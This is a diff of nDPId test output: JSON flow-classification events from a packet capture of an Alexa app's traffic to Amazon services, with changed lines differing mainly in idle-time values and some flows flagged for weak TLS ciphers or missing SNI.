+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-01048{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+01048{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 